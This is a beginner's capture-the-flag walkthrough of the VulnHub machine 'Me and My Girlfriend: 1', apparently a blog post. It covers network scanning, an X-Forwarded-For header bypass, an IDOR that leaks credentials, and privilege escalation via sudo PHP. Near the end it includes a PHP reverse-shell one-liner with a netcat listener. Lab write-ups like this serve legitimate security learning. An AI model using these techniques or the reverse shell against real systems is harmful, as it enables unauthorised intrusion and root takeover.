Me and My Girlfriend: 1 machine crack

4 min readAug 23, 2020

This my 1st writeup. so, please forget my mistake.

So let’s start; I think everybody knows about vulnhub(if anybody didn’t know ,try to explore is blog:

The machine was released on 13 Dec 2019.(Here is the link:,409/)

Difficulty Level: Beginner

Notes: there are 2 flag files

Learning: Web Application | Simple Privilege Escalation

This is a boot to root challenge.

let us start hacking!

Run the simple command in your terminal :arp-scan — localnet

after that, we see there is a IP address( where my Vulnerability VM running.

I want to know which service was running on that machine. for that I use Nmap.

Here we see that port 80 was open. that means there was webservice was running.

just type the ip in your web browser

when i visit , it gives me this message , i think it gives me any Hint (like only admin or any local address access this ,like

open the source code(ctrl+U)

Here some message it gives me , I think it may be another any Hint. when i see x-forwarded-for, I am pretty sure their maybe any HOST HEADER attack possible. for testing host header, I refresh the page and

Intercept the trafic in burp suite

After intercept i simply added this header
X-Forwarded-For: localhost

boom we got an interesting page 😎😎😎

it looks like any sign/signup page..😉🤷‍♂️

click on login tap

I think there may be any SQL injection. so i brute force some payload .but I failed.😢😢

Click on Register tab

here I registered myself in the register area and logged in😜😜

when I see the id parameter in the URL, I think there some parameter pollution bug. so change it from 0 to 12. when id =5; it gives me some interesting thing.🤷‍♀️🤷‍♀️

change id =5 in URL

That means some existing user in at id =5;

click on profile

Boom I got some user details.🤑🤑

In this CTF, If you remember in the description, Alice was very important to the scenario. 🚑🚑

Then I remembered that we also had a ssh port open and i loggin it via ssh

After logging,i find for flag1 . for that, I was ls -a command

IN .my_secrect folder looks like some juicy so enter in that folder.

BOOM I find flag1 😎✌🤞🤞, now looking for priv esc👀👀👀👀🐱‍👤

now i look for sudo rights for that, I use this command sudo -l

Here I see , Alice can run PHP program as a Root user

so i run this command

sudo /usr/bin/php -r ‘$sock=fsockopen(“”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’

as well as I run netcat for listing at 1234 port

BOOM i got root shell😎🐱‍👤🐱‍👤🐱‍👤🐱‍🏍🐱‍🏍🐱‍🏍

now it’s time for find the flag2😁😁😁😁

so I move to root .then type ls command and find flag2

Thanks for reading my blog ..i hope it will help you😁😁🐱‍👤🐱‍👤😎😎




I am a noob , who always ready to help you in a different way.